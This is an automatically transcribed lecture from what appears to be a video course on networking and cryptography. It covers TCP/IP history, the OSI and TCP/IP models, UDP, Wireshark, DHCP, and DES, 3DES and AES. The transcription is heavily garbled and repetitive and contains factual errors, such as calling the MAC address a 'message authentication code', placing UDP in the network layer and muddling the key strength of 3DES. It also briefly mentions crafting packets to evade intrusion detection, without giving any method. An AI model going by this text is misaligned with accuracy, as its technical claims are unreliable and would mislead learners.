that allowed it to turn
into this interface

message processor,
which passed messages

over arpanet from one location
to another so
where did I become

hint here in 1973?
So I became in here
as well in 1973
as I just said and a guy

but name of Vint Cerf
and another guy by the name

of Robert Kahn took.
The ideas of NCP and

what the arpanet was doing
and they tried to come up

with some Concepts
that would work for the needs
that the arpanet had

and so by 1974.
They had published a paper

that was published by the IEEE
and they propose

some new protocols.
They originally proposed

the central protocol called TCP
later on TCP was broken into TCP
and IP to get away

from the monolithic concept
that TCP was originally

so they broke it
into more modular protocols

and thus you get TCP and IP.
So how do we get to our version?
Or which is ipv4
since that's the kind
of Internet that we're using

right now version 6 is coming
and has been coming

for many many years now,
but you're still
kind of version for
so how did we get here

between 1977 and 79
and we went through version 0

to 3 By 1979 and 1980.
We started using version 4 and
that's eventually became

the de facto protocol
on the internet in 1983
when NCP was finally shut down

because of all the hosts
on the arpanet,
but we're using TCP IP.
By that point in 1992 work began
on an IP Next Generation
and for a long time,
although the specifications
in the rfc's talked

about P&G eventually
and I PNG became known as IPv6.
You may be wondering

where ipv5 went.
Well, it was
especially purpose protocol
that had to do something
with streaming and certainly

not a widespread thing.
One of the differences

between ipv4.
And IPv6 is
that IPv6 has a 128-bit address

which gives us the ability
to have some Recklessly

large numbers of devices
that have their own unique

IP address IP V4 by comparison
has only 32-bit addresses.
And as you probably

heard we're well
on our way to exhausting

the number of IP addresses
that are available

and we've done a lot
of things over the years

to conserve address space
and reuse address space
so we can continue to extending

to the point till
where we completely
run a 5p V4 addresses.
Another thing about IPv6

is it attempts to fix
on the inherent issues and IP
and some of those has to do

with security concerns
and there are certainly

a number of flaws and ipv4.
I'm going to start working

on IP Next Generation or IPv6.
They try to address some

of those concerns in some
of those issues and they

may not have done it perfectly
but it was certainly an attempt
and IPv6 attempt to fix

some of the issues
that were inherently in IP.
And so that's the history of

TCP IP still very reach today.
Okay.

a brief history on TCP IP
and how it came about

to the TCP IP version
4 Cisco's the model itself.
Now we're going to be

discussing two models.
And those are the OSI model

and the TCP IP model.
Now as I said will be talking

about the OSI and TCP models
for Network protocols

and the network Stacks OSI.
First of all is the one
that you see out here is the one

on the left hand side
of the screen and OSI stands for

open systems interconnection.
And in the late 1970s,
they start working on a model

for how a network stack
and network protocols would look

originally the intent was
to develop the model

and then developed protocols
that went with it.
But what ended up happening was
after they develop the models

TCP IP started really taking off
and the TCP IP model was
what went along with it

and much better
what was going on with TCP IP,
which became the predominant

protocol and as a result
The OSI protocols

never actually got developed.
However, we still
use the OSI model
for teaching tool as

well as way of describing
what's going on
with the network stack
and the Applications
you'll often hear people talking

about different layers.
Like that's a little too problem
or render layer
3 space now continuing
through these lessons.
I'll refer occasionally

to the different layers.
And when I do that,

I'm referring to the OSI model.
So let's take a look

at the OSI model starting
from the bottom.
We have the physical layer,
which is where all the physical

stuff lives the wires and cables
and network interfaces
and hubs repeaters switches

and all that sort of stuff.
So all that's all physical stuff

is sitting Sitting
in the physical layer now
sitting Above This is

the data link layer.
And that's where

the ethernet protocol
ATM protocol frame relay.
Those are things live.
Now.
I mentioned the switch
below the physical

the switch lives at layer 1,
but it operates at layer 2.
And the reason it

operates at layer 2 is
because it looks
at the data link address
and the layer

to our physical address
and that's not to be confused

with in the physical layer.
It does get a little

mixed up sometimes
and we refer to the MAC address
now the MAC address is

not the physical address.
I'm talking about it
is the message
authentication code dress
on the system as
so the MAC address
on system as a physical address
because it lives
on the physical interface
and bound physically.
However that Mac address
or media Access Control

address lives at layer
2 at the data link layer

the network layer,
which is right above at layer 3.
That's why the IP lives

as well as icmp ipx
and from ipx SPX
to the protocols from novel

routers operate at layer 3.
Three and at layer 4 above that

is the transport layer.
That's the TCP UDP and SPX again
from the ipx SPX suit
of protocols number
of that is the session layer
and that's layer 5 and
that's a plot of SSH as well

as several other protocols.
Then there's a
presentation layer
which is a layer 6 and

you'll often see people refer
to something like jpeg

or MPEG as examples of protocols
that live on that layer then

there's a presentation layer,
which is the final layer
which is layer 6 and you'll

often see people refer
to something like Jpeg,
or MPEG as example the protocol

that live at that layer
and then the live at that layer

which is the presentation layer.
Finally.
We have Leo 7,
which is the application layer

and that's actually TP FTP SMTP
and similar application

protocols whose responsibility
is to deliver and use

the functionality.
So that's basically
the OSI model and
that's the seven layers

of the OSI model
and there's some important

thing to note here.
That is when we
are putting packets
onto the wire the packets

get built from Top.
Top of the Stack Down
by from the top of the stack

to the bottom of the stack
which is why it's called

a stack each layer sits
on top of the other
and the application layer

is responsible for beginning
the process and then
that follows through

the presentation session
and transport layer and down

through the network data link
until we finally drop it on

the wire at the physical layer
when it's received

from the network.
It goes from the bottom up
and we receive it
on the physical
and gets handled

by the data link
and then the network

and till the application layer.
So basically when a packet

Coming in it comes in
from the application goes

out from the physical
and then we're going out also,
it goes from the physical

through the data link,
then the network

transport session presentation
and application and finally

to the Target system.
Now what we're dealing with is
an encapsulation process.
So at every layer on the way

down the different layers
add bits of information

to the datagram all the packet.
So that's when it gets
to the other side

each layer knows
where it's demarcation pointers.
Well, it may seem

obvious each layer.
Talk to the same layer.
On the other side.
So when we drop a packet out
onto the wire the physical layer

talks to the physical layer
and in other words

the electrical bits
that get transmitted by

the network interface
on the first system are received
on the second system

on the second system.
The layer two headers
have report by the first

system get removed
and handled as necessary.
Same thing at the network layer.
It's a network layer

the puts the IP header
and the network layer
that removes the IP header

and determines what to do
from there and so

on and so on again
while it may seem obvious
It's an important
distinction to recognize
that each layer talk

to each layer
while it may seem obvious.
It's an important
distinction to recognize
that each layer talk

to each layer.
And when you're building

a packet you go down
through the stack
and when you're receiving

you come up to the stack.
And again, it's called a stack
because you keep pushing things

on top of the packet
and they get popped

off the other side.
So that was detailed
and brief working on

how the OSI model is set up
and how the OSI model works now,
let's move on to the VIP model,
which is on the right hand side

and you'll notice
that there's a really

big difference here that being
that there are only four layers

in the TCP IP model
as compared to the seven layers

of the OSI model.
Now, we have
the network access layer
the internet layer the transport

layer and the application layer
in the functionality.
Now, we have the access layer
the internet layer

the transport layer
and the application

layer the functionality
that the stack provides is

the same and in other words,
you're not going

to get less functionality
out of the TCP IP model.
It's just that they've changed

where And functionality decides
and where the demarcation point

between the different layers are
so there are only four layers

in the TCP IP model,
which means that a couple

of layers that have taken
in functions from some

of the OSI models
and we can get into that right

here the difference
between the models

at the network access layer
in the TCP IP model
that consists of the physical
and the data link layer

from The OSI model.
So on the right here,
you see the network access layer
that takes into the account

the physical and the data link
layers from The OSI model
and the Left hand side similarly
the application layer

from the TCP IP model
and compresses all

the session presentation
and the application layer

of the OSI model
on the right the very

top box the application layer
and Compass has

the session presentation
and application layer

and on the left hand side
that of course leaves

the transport layer to be
the same and the OSI model.
They call it the network layer

and then dcpip model.
It's called the internet layer

same sort of thing.
That's where the IP lives

and even though it's called
the internet layer as

compared to the network layer.
It's Same sort of functionality.
So those are the really

big differences between OSI
and dcpip model anytime.
I refer to layers
through the course of this video
that I'm going to be referring

to the OSI model and in part
because it makes
it easier to differentiate
the different functionality.
If I were to say live

on function in the TCP IP model,
you would necessarily know
if I was talking
about a physical thing
or a data link thing
since there's more granularity

in the OSI model.
It's better to talk about

the functionality in terms.
Terms of the layers

in the OSI model
and that's the predominant

model The OSI model
and the TCP IP model
for Network Stacks Network

protocols and applications.
Okay.

the TCP IP model.
Let's go over some

another important protocol
and that is UDP.
So what do you see out here
on your screen right

now is Wireshark
and we'll be going

over the users of our shark
and what it's useful for

in the sock upcoming lessons.
But for now, let me

just show you a UDP packet.
Okay.
So before we get
into the analysis of the packet

while it's still filtering,
let me just tell you

a little bit about you to be
so UDP is a protocol and

the TCP IP suit of protocols.
It's in the network layer.

That's a network layer
in the OSI.
So similar reference model

the IP network layer carries
the IP address
and that has information

about how to get back is
to his destination
the transport layer sits

on top of the network layer
and that carries information
about how to differentiate

Network layer applications
and that information about

how those Network application
gets differentiated is
in the form of ports.
So the transport layer has ports
and the network layer has

in this case an IP address.
And UDP is a transport layer

protocol and UDP stands
for user datagram protocol
and often call connectionless

or sometimes unreliable.
Now unreliable doesn't mean
that you can't really rely

on it unreliable means
that you can't just
that what you sent

is reaching the other side.
So 1 means actually
that there's nothing
in the protocol that says

it's going to guarantee
that the data Will Graham

that you send or the fact
that you send is going to get
where you wanted send it.
So the Tikal has no sort

of safety feature like that.
So you shouldn't use

this protocol that is used to be
if you want some sort

of safety net.
And if you needed that type

of safety net you
would have to write it

into your own application.
So basically UDP is
a fast protocol and that's one
of the reason why it's good.
It's also on the reason

why it's unreliable
because in order to get

that speed you don't have
all of the error

checking and validation
that messages are getting there.
So because it's fast it's good
for things like games

and for real-time voice
and video anything

where speed is important.
And you would use UDP.
So right here.
I have a packet capture.
So I'm using Wireshark capture

some buckets and let's check out
UDP packet so out here you see
that there are some freedoms
that says 167 bites on bio

167 bites have been captured
but we're not really interested

in the frame part.
You're interested in
the user datagram protocol.
But so here you can see
that the source board is

one eight five three
and the destination

Port is Phi 2 0 8 1
now it has a length

and it has a checksum and Tough.
So as you guys see

out here, well,
we don't really see

a bunch of information
what you only see

is a source port
and the destination port land

and there is also a checksum
so you to be doesn't come

with an awful lot of headers
because it doesn't need any
of the things that you see

in the other packet headers.
The only thing it

needs is to tell you
how to get the application

on the receiving host.
And that's where

the destination Port comes in
and wants the message gets

to the destination.
The destination needs to know
how to communicate back

to the originator
and that would be

Through the source port
or a return message.
So a return message
would convert The Source port
to a destination port
and send back to that board
in order to communicate
with the originator.
So we have a source port

and destination port
and the length is
a minimal amount of checking

and to make sure that
if the packet that you received

as a different from the length
that specify in the UDP header,
then there may have

been something wrong
so you won't may want

to discard the message to check
for more messages.
So the checksum also make sure
that nothing in the middle

was tampered with although it's
if there's some sort

of man in the middle.
Attack or something like
that a checksum is
pretty easy to manufacture
after you've altered the packet
so you can see here

in the message
that there's a number

of UDP packets some of them
just UDP the one look
and happens to be
from some Skype application,
I guess so talking
to Skype servers
and we've already got
the DNS now DNS also
needs some Fast Response times
because you don't want

to send a lot of time looking
up information about service

that you're going to before
because just to go to them.
So DNS server through all

throughout their queries
on to the Using UDP hoping

to get fast sponsors.
They don't want to spend a lot

of time setting up connections
and during all the negotiating
that comes at the

protocol like TCP.
For example.
So here you see

that the DNS is using UDP and
what we've got here is another

UDP packet for Destination
and all sorts of stuff
so you can see it out here
so you can see the checksum.
It's unverified checksum status
so you can check out all sorts

of stuff using Wireshark.
So that was about UDP

or The user datagram protocol.
Okay.
So now that we're done

with the user datagram protocol.
Let's talk about

addressing mode.
So addressing modes is
how you address a packet
to your different destination.
So there are three kinds

of addressing mode.
The first kind of addressing

mode is unicast.
This is pretty simple

one to understand.
So there is one destination

and one source
and the source sends

the packet to the destination
and it's it depends

on the protocol
that you're using

to actually address.
So if it's something
like TCP IP your Using

a bi-directional stream.
So the blue computer can talk

to the red computer
and the red computer can talk

back to the blue computer,
but you can also use

a UDP stream which is
like One Direction stream.
So it's not sure

if I'm using the correct word.
So it's a stream that

in One Direction.
I guess I'm driving

home the point here.
So if it's UDP only

blue is talking
and when blue stops

talking then read can talk,
but if it's dcpip blue and red

him talk simultaneously
at the same time now moving

on there's also so
broadcast now broadcast means
that you are sending

your bracket to everybody
on the network.
So broadcast messages
are very common
from mobile network providers
so many get those

advertisements saying something
like you have

a new postpaid plan
from Vodafone or as hell

or something like that.
Those are broadcast messages.
So it's one server

that is sending out
one single message to all

the other systems now,
there's also multicast now.
The cast is like broadcast
but selective now

multicast is used
for actually casting yours

your screen to multiple people.
So something like screen share
and you're doing it with

multiple people is multicast
because you have the option

to not show particular computer
what you are actually sharing.
So those are three modes
of addressing unicast
broadcast and multicast.
Okay now moving

on let's look into the tool
that we just used once and UDP.
That is why sure.
So what exactly is wash off?
So this utility called

Wireshark is a packet capture.
Usually meaning that

it grabs data.
That's either going out
or coming in of a specific
Network and there are a number
of reasons why
this may be useful
or important on the reason

why it's really important is
what's going on in the network

is always accurate.
In other words.
You can't mess

around with things
once they're on the network

or you can't lie about something
that's actually on the network

as compared with applications
in their logs,
which can be
misleading or inaccurate.
Or if an attacker gets
into an application they
may be able to alter the logging

now several other behaviors
that make it difficult to see

what's really going on
and the network

you can really see
what's going on.
Once it hits the wire.
It's on the wire and you

can't change that fact now
once it hits the wire
so we're going to do here

is a quick packet capture.
So let me just open up

our shop for you guys.
I have already washed

Shock open for us.
Let me just remove

the CDP filter that was there.
So why shock is Cheering.
So let's go over the stuff

that you can see
on the screen some important

features of our sharks
so that we can use it later.
So what I'm doing here
is a quick packet capture

and I'm going to show some
of the important
features of Wireshark
so that we can use

it later on now
when we're starting to do

some more significant work.
I select the interface

that I'm using primarily,
which is my Wi-Fi,
and I'm going to be go over here

and we'll bring up a Google page
so that we can see

what's happening on the network.
So let me just quickly open

up a Google page
as you guys can see

It's capturing a bunch of data
that's going on here.
Let me just open

up a Google base
and that's going

to send up some data.
Let's go back.
So it's dropping a whole bunch

of stuff of the network.
I'm just going to stop

that going to go back
and go back and take a look

at some of the messages here.
So some of the features

of a shock as you can see
on the top part of the screen.
It doesn't window
that says number time Source

destination protocol length
and info and those are

all of the packets
that have been captured

in the numbering starting from 1
and the time I'm has to do

with being relative to the point
that we've started capturing

and you'll see the source
and destination addresses
and the protocol

the length of the packet
and bytes and some information
about the packet

the bottom of the screen.
You'll see detailed information

about the packet
that has been selected.
So suppose I'm sales selecting
this TCP packet out

here so we can go
through the frames frame also
has an interface ID
is encapsulation type
and all sorts of information.
Is there about the frame

then we can look
at the source Port

destination Port see Stumble
the flag said the check sums,
you can basically check

everything about a packet
because this is
a packet analyzer
and a packet sniffer.
Now, you'll see
some detail information

about the back of that.
I'll be selected.
So I'm going to select so

the selected this TCP IP packet.
We see that in the middle frame

and says frame 290.
It means that it has

a 298 lat packet and the packet
that was capture 66 bites and we

grabbed 66 Bisons 528 bit later.
So you what do you see

out here was source
and the destination In

Mac address of the layer
to layer address
and then you can see

the IP address
of both source and destination
and says it's

a TCP packet gives us
a source Port destination port
and we can start drilling down

into different bits
of the packet and you can see
when I select a particular

section of the packet down
at the very bottom you can see
what's actually a hex dump
of the packet and on the right

hand side is the a sky.
So this is the hex hex dump
and is the a sky that

you're looking at.
What's really cool

about varsha gate is
it really pulls the packet

into it's different layers
that we have.
Spoken about the different

layers of the OSI
and the TCP IP model
and the packets are put

into different layers
and there's a couple

of different models
that we can talk about with that
but were shocked

does really nicely.
Is it demonstrate
those layers for us
as we can see here.
It is actually four layers
and in this particular packet

here we can also do something.
So I've got
a Google web request.
So what I want to do here is
I want to filter based on HTTP,
so I find a filter.
So let's see
if we can do an http.
And what I see here

is says text input
and it's going to get an image.
That's a PNG image.
And this is a request

to get the icon
that's going to be displayed

in the address bar.
So you also see something

called our pouch here,
which I'll be talking

about very soon.
So let's just filtering

be done now in the web browser.
It's a favicon dot Ico

that can do here.
I can select analyze

and follow TCP streams.
You can see all

the requests related
to this particular request
and it breaks them

down very nicely.
You can see we've sent

some requests to Spotify
because I've been using

spotify you actually listen
to some music then you

can see all sorts of stuff.
Like this was something

to some not found place.
So let's just take

the Spotify one and you can see
that we get a bunch
of information from
the Spotify thing.
At least you can see

the destination The Source,
it's an Intel core machine.
So the first part
of the MAC address the first

few digits is lets you tell
if it's what what is vendor ID

so Intel has its own member ID.
So F 496 probably tells us

that it's that's an Intel Core.
So why shock does this

really neat little thing
that it also tells us

from the MAC address what type
of machine you're
sending your packets
to from the back address itself.
So it's coming
from Sophos foresee
and going to an Intel Core

in the type is ipv4.
So that was all about Bioshock.
You can use it extraneously

for packet sniffing
and pack analysis.
Packet analysis come very handy
when you're trying

to actually figure out
how to do some stuff

like IDs evasion
where you want to craft

your own packets
and you want to analyze packets

that are going into the IDS
system to see which packets
are actually getting detected

its as some intrusion
so you can craft your bucket

and a relative manner
so that it doesn't get actually

detected by the idea system.
So this is a very Nifty little

tool will be talking about
how you can craft your own

packets just a little while,
but for now, Now,

let's move ahead.
Okay.
So now that we're done with

our small little introduction
and a brief views

on history of our shop.
Now, let's move on

to our next topic for the video.
That is DHCP.
Okay.
So DHCP is a protocol
and it stands for dynamic

host configuration protocol.
So DHCP is a network
management protocol used
to dynamically assign
an Internet Protocol address
to any device on the network
so they can communicate

using IP now DHCP.
Means and centrally
manages these configurations

rather than requiring
some network administrator to

manually assigned IP addresses
to all the network devices.
So DHCP can be implemented
on small or small local networks

as well as large Enterprises.
Now DHCP will assign new

IP addresses in each location
when devices are moved

from place to place
which means Network

administrators do not have
to manually initially
configure each device
with a valid IP address.
So if device This is
a new IP address is moved
to a new location
of the network.
It doesn't need any sort

of reconfiguration.
So versions of DHCP
are available for use
in Internet Protocol version

4 and Internet Protocol
version 6 now
as you see on your screen

is a very simplistic diagram
on how DHCP works.
So let me just run

you down DHCP runs
at the application layer
of the TCP IP protocol
stack to dynamically assign

IP addresses to DHCP clients
and to allocate
TCP IP configuration information
to It's TB clients.
This includes subnet mask
information default gateways
IP addresses domain name

systems and addresses.
So DHCP is a client-server
protocol in which
servers managed full
of unique IP addresses
as well as information about

line configuration parameters
and assign addresses

out of those address pools now
DHCP enabled clients send

a request the DHCP server,
whenever they connect

to a network the clients
configure with DHCP broadcasts

a request the DHCP server
and the request Network.
In information for local network

to which they are attached
a client typically
broadcasts a query
for this information immediately
after booting up
the DHCP server response
to the client requests
by providing IP configuration
information previously specified
by a network administrator.
Now this includes

a specific IP address as well as
for the time period also
called Lee's for which

the allocation is valid
when refreshing an assignment
a DHCP client request

the same parameters
the DHCP server May assign

the new IP address based
on the You said by

the administrator now
a DHCP server manages a record
of all the IP addresses it

allocates to networks nodes.
If a node is we are located

in the network the server
identifies it using its media

Access Control address now
which prevents accidental

configuring multiple devices
with the same IP address now

the sap is not routable protocol
nor is it a secure one DHCP
is limited to a specific
local area network,
which means a
single DHCP server.
A pearl an is adequate now

larger networks may have a wide
area network containing multiple

individual locations depending
on the connections
between these points
and the number of clients

in each location.
Multiple.
DHCP servers can

be set up to handle
the distribution of addresses.
Now if Network administrators

want a DHCP server to provide
addressing to multiple subnets

on and given Network.
They must configure

DHCP relay Services located
on interconnecting routers
that DHCP request

to have to cross
these agents relay messages.
Between DHCP client
and servers dscp also lacks

any built-in mechanism
that would allow clients

and servers to authenticate
each other both are vulnerable

to deception and to attack
where row clients can exhaust

a DHCP servers pool.
Okay.
So let's move on
to our next topic
and that is why use DHCP.
So I just told you
that DHCP don't really have

any sort of authentication
so it can be
folded really easily.
So what are the advantages

of using DHCP
so The sap offers quite

a lot of advantages
firstly is IP address management

a primary advantage
of dscp is easier management

of IP addresses in a network
with the DHCP.
You must manually

assign IP address,
you must be careful

to assign unique IP addresses
to each client
and the configure
each client individually
the client moves

to a different network.
You must make model

modifications for that client.
Now when DHCP is enabled
the DHCP server manages

the assigning of IP addresses
without the administrators

intervention clients.
And move to other
subnets without panel

country configuration
because they obtained
from a DHCP server

new client information
appropriate for the new network

now apart from that you can say
that the hcp also
provides a centralized
Network client configuration.
It has support
for boot TP clients.
It supports of local clients

and remote clients.
It supports Network booting
and also it has a support

for a large Network
and not only for sure

like small-scale networks,
but for larger Works as well.
So that way you see DHCP has

a wide array of advantages even
though it doesn't really

have some authentication.
So because of these advantages

DHCP finds widespread use
in a lot of organizations.
Okay, so that winds

up DHCP for us.
So let us go into the history

of cryptography now.
So let me give you

a brief history
of cryptography now cryptography
actually goes back several

thousand years before shortly
after people began to find ways

to communicate there are some
of Who were finding ways

to make the understanding
of that communication difficult
so that other people

couldn't understand
what was going on.
And this led to the development

of Caesar Cipher
that was developed

by Julius Caesar
and it's a simple

rotation Cipher and by that,
I mean that you rotate a portion
of the key in order

to generate the algorithm.
So here's an example.
We've got two rows

of letters and
that are alphabetical in order
and means we basically wrecking

the alphabets down
and the second row

is shifted by three.
Letters so Abby is a z actually

because if you move that way B
is a z from the first row
gets shifted back the second row
and then the letter

D becomes letter C
the there's that's an example

of how encryption works.
So if you try to encrypt

a word like hello,
it would look completely

gibberish after it came
out of the algorithm.
So if you count the Letters

Out you can see that letter H
can be translated
to little a letter L.
So that's a Caesar Cipher.
Now you must Little things

like rot13 which means
that you rotate the 13 letters

instead of three letters.
That's what we
can do here again,
and this is just

a simple rotation Cipher
ourseives the cipher that's
what of course the rod stands

for its rotate or rotation.
Now coming forward

couple thousand years.
We have the Enigma Cipher now,
it's important to note

that the Enigma is not the word
given to this particular Cipher

by the people who developed it.
It's actually the word

given to it by the people
who were trying to crack
it the Enigma Cipher
is a German Cipher,
they develop this

Cipher and machine
that was capable of encrypting

and decrypting messages.
So they could messages
to and from different

battlefields and waterfronts,
which is similar
to the Caesar Cipher
sees a use it to communicate

with his Butterfield generals
and the same thing.
We're with the Germans.
You've got to get messages

from headquarter down
to where the people

are actually fighting
and you don't want

it to get intercepted
in between by the enemy.
So therefore you use encryption
and lots of energy

was spent by the allies
and in particular the British

trying to decrypt the messages.
One of the first instances
that we are aware of
where machine was used

to do the actual encryption
and we're going to come ahead

a few decades now into the 1970s
where it was felt
that there was a need for

a digital encryption standard.
Now the National
Institute of Standards
and technology is responsible

for that sort of thing.
So they put out a proposal for

this digital encryption standard
and an encryption algorithm.
What ended up happening

was IBM came up
with this encryption algorithm
that was based

on the Lucifer Cipher
that it was one of their people

had been working on on a couple
of years previously in 1974
and they put

this proposal together
based on the Lucifer Cipher
and in 1977 that proposal
for an encryption
algorithm was the one
that was chosen to be

the digital encryption standard.
And so that came

to be known as Des over time
and it became apparent
that there was a problem
with this and that was it

only had a 56 bit key size
and while in the 1970s
that was considered

adequate to defend
against brute forcing

and breaking of course.
By 1990s.
It was no longer considered

adequate and there was a need
for something more and it

took time to develop something
that would last long

for some long period of time
and so in the meantime

a stopgap has developed
and this stopgap is
what we call the triple Des.
The reason it's called

triple Des is
you apply the Des algorithm

three times in different ways
and you use three different keys

in order to do that.
So here's how triple Des Works

your first 56 bit key is used
to encrypt the plain text just
like you would do
with the standard

digital encryption standard
algorithm but changes

and you take that Cipher text
that's returned from

the first round of encryption
and you apply the decryption

algorithm to the cipher text.
However, the key

thing to note is
that you don't use the key

that you use to encrypt you.
Don't use the first

key to decrypt
because otherwise you'll get

the plain text back.
So what you do is
you use a second key
with the decryption algorithm

against the cipher text
from the first round.
So now you've got

some Cipher text
that has been encrypted

with one key and decrypt it
with Second key and we take

the cipher text from that
and we apply a turkey using

the encryption portion
of the algorithm to
that Cipher encryption portion
of the algorithm
to that ciphertext to receive
a whole new set of ciphertext

obviously to do the decryption.
You do the third key
and decrypt it with

the second key you encrypt it.
And then with the first

key you decrypt it.
And so you do reverse order
and the reverse algorithm at

each step to apply triple Des.
So we get an effective key size

of about one sixty eight bits,
but it's still only

X bits at a time.
Now I said triple Des

was only a stopgap.
What we were really looking
for was Advanced encryption

standard once again
and niste requested proposals
so that they could replace

the digital encryption standard
in 2001 after several thousands

of looking for algorithms
and looking them
over getting them evaluated
and getting them looked

into this selected an algorithm
and it was put together by

a couple of mathematicians.
The algorithm was called
rijndael and that became the

advanced encryption standard.
Or AES, it's one

of the most advantages
of AES is it supports
multiple key lens currently
what you'll typically see is
as we are using 128-bit keys.
However, AES supports

up to 256 bit key.
So if we get the point
where 128-bit isn't enough

we can move all the way up
to 256 bits of keying material.
So cryptography has
a really long history.
Currently.
We are in a state where we
have a reasonably stable

encryption standard and AES,
but the history

of cryptography shows
that with Every set
of encryption eventually
people find a way to crack it.
Okay.
So that was a brief

history of cryptography.
Now.
What I want to do
is let's go over
and talk about a yes

triple des and Des in themselves
because they are

some really key cryptography
key moments in history
because there's some really

key historic moments
in the history of cryptography.
Now, we're going to talk
about the different types

of cryptography key ciphers
and primarily we're going
to be talking about
this triple des and AES now.
This is the digital

encryption standard.
It was developed by
IBM in the 1970s.
And originally it
was cryptography Cipher
named Lucifer
and after some modifications

IBM proposed it as
and it was selected by

ever since then

it's been known as dis.
Now one thing
that cost a little bit

of controversy was
during the process of selection
and it's a requested

some changes and it hasn't been
particularly clear but changes
were requested by the NSA.
There has been

some speculation that wondered
if the NSA was requesting
a back door into this

which would allow them to look
at encrypted messages
in the clear.
So basically it would
always give the NSA
the ability to decrypt

DS encrypted messages.
It remained the encryption

standard for the next couple
of decades or so.
So what is this and

how does it work?
Basically?
It uses 56-bit Keys rather

than the stream Cipher.
It's a block Cipher and it uses

a 64-bit blocks and a 1998 -
was effectively broken

when a desk
If the message was cracked
and three days a year

later a network
of ten thousand systems
around the world crack

the best encrypted message
in less than a day
and it's just gotten worse
since then with modern

computing power being what it is
since this was actually created

we already have come
to the realization
that we needed something else.
So Along Came triple Des
now triple DES isn't

three times the strength
of desk necessarily it applies.
There's just three times

and what I mean by that is is
what we do is we take a plain

text message then let's call
that P and we are going to use

a key called K 1 and we're going
to use that key to encrypt

a message and use a key
that will be will call K1
and we're going to use

that to encrypt the message
and that's going to result

in the ciphertext
and we will call the c 1 so c 1
the output of the first

round of encryption.
We're going to apply

a second key and we'll call
that K2 with that second key
and we're going to go

through a decryption process
on see one
since it's the wrong key.
We're not going to get

plain text out on the
And what we're going to get

is another round of ciphertext
and we will call this c 2

what we do with c 2.
We are going to apply a third
key and we will call this K 3
and we're going

to encrypt ciphertext c 2

in another round the ciphertext
and we will call that c 3.
So we have 3 different Keys

applied in two different ways.
So with Chi 1 and Chi 3 we

do a round of encryption
and with key to we do

a round of decryption.
So it's an encrypted Crypt

and crypt process
with separate keys while

that doesn't really healed.
A full 168 bit key size

the three rounds of encryption
yields an effective key size of

a hundred and sixty eight bits
because you have

to find 356 bit keys.
So speaking of that technical

detail for triple Des.
We're still using the test block

Cipher with 56-bit keys.
But since we've got

three different Keys,
we get an effective length

of around 160 8.
Bits triple Des was really

just a stopgap measure.
We knew that if test

could be broken triple desk
surely we broke in
with just some more time again.
And so the nest was trying

to request a standard
that was in 1999.
And in 2001 this

published an algorithm
that was called a s

so this algorithm
that was originally
called rijndael was

published by nist as
advanced encryption standard

some technical specifications
about a s is
that the original drained

all album specified
variable block sizes

and key lengths
and as long as those lock sizes
and key lengths were

multiples of 32 bits.
So 32 64 96,
and so On you could use

those block sizes and key lens
when a s was published
a specified a fixed
128-bit block size
and key length
of 128 192 and 256 a yes

with three different key lengths
but one block size and
that's a little bit of detail

about desk triple des and AES.
So when a s was published
a specified fixed
128-bit block size
and a key length

of 128 192 and 256 bits.
So we've got with a S3

different key lens,
but one block size.
And that was a little bit
of detail about this triple des

and AES will use some of these
and doing some Hands-On work

and the subsequent part
of this video.
Okay.
So now that I've given

you a brief history
of how we have reached

to the encryption standards
that we're following today.
That is the advanced

Let's go ahead
and talk a little bit more

about this triple des and AES.
So this is a digital
It was developed by IBM

in the 1970s and originally it
it was a cryptographer
xi4 named Lucifer
and after some modifications

IBM proposed it as
the digital encryption standard.
It was selected to be
and ever since then

it's been known as Tes
or deaths one thing
that caused a little bit

of controversy was
during the process of selection

the NSA requested some changes
and it hasn't been
particularly clear
what changes were

requested by the NSA.
There has been some sort

of speculation that wondered
if the NSA was requesting

a back door into this.
It'll encryption standard
which would allow them to look

at encrypted messages
in the clear.
So basically it would
always give the NSA
the ability to decrypt

this encrypted messages.
It Remains the encryption

standard for the next couple
of decades or so.
And what is this and

how does it work now
tests Remain the digital

standard for encryption
for the next couple of decades.
So what does it do
and how does it work?
So basically it uses
a 56 bit key rather

than a stream Cipher.
It's a block Cipher and it

uses 64-bit blocks and in 1998,
if you know there's

was effectively broken
when a des encrypted message

was cracked in three days
and then a year later

a network of 10,000 systems
around the world crack

the Des encrypted message
unless and a day
and it's just gotten worse
since then with modern Computing

being what it is today.
Now since this was created
and broken we knew

we needed something
and what came in between

Advanced encryption standards
and this is triple

Des now triple
Des is Three times the strength

of this necessarily it's really
there's applied three times
and what I mean by that is

we take a plain text message,
then let's call
that P and we are going

to use a key called K
1 and we're going to use

that key to encrypt the message

in the ciphertext one.
So we'll call that C1

now c 1 is the output
of the first round of encryption
and we're going to apply

a second key called key
to and with that second piggy.
We are going to go through

a decryption process on C1 now
since it's the wrong key we are.
Not going to get the plain text

out of the decryption process
on the other end.

We are going to get
another round of ciphertext
and we're going to call

that c 2 now with c 2.
We are going to apply

a third key and we are going
to call that K 3 and we're going

to encrypt ciphertext c 2

in ciphertext C 3
so we have 3 different Keys

applied in two different ways.
So what Chi 1 Chi 3 we do around

of encryption with key to we do
around a decryption.
So it's basically an unencrypted

decrypt encrypted process
with three separate keys,
but It does really is

it doesn't really healed
a 168 bit key size
because ineffectiveness it's

basically 256-bit keys
that are being used to race it
whether it be
three different keys.
So ineffectiveness,
you could say

that it's the 168 bit key,
but it is not the same strength

because people realize
that triple Des

can be easily broken
because if this is broken,
you can do the same thing

with three different ways
whether whatever key

that you use
so it just takes longer time.
To decrypt if you
don't know the tree
and if you are just using

a Brute Force attack,
you know that triple

Des can be broken
if this can be broken.
So triple Des was literally

a stop gap between Des and AES
because people knew
that we needed something

more than triple des and for
this the NISD
or the National
Institute of Standards
and technology in 2001.
They chose a s as the algorithm
that is now called

Advanced encryption algorithm.
So it was originally called

the rijndael algorithm.
And the main thing

about the rijndael algorithm
and advanced encryption

standard algorithm.
Is that the rijndael
algorithm specifically
States in its papers
that it has available block size
and available key size

as long as they are
in multiples of 32.
So 32 6496 like that.
But what AES does differently is

that it gives you one block size
that is 128 bits and gives

you three different key sizes
that is 128 192 and 256.
So with AES three

different key lens,
but one block size.
Okay, so that was a little bit

more information on a yes this
and triple des
and we are going

to be using this information
in some subsequent lessons

Okay now moving on.
Okay.

the different history of
cryptography and more important

cryptography algorithms.
Let's discuss the different

types of cryptography.
Now, the first type of

cryptography I'm going to talk
about is symmetric cryptography

and by symmetric cryptography,
I mean Key is the same

for encrypting or decrypting.
So I use the same key
whether I am encrypting the data

or decrypting data.
Well things about symmetric

key cryptography is
that the use a shorter

key length then
for asymmetric cryptography,
which I'll get into

a couple of minutes.
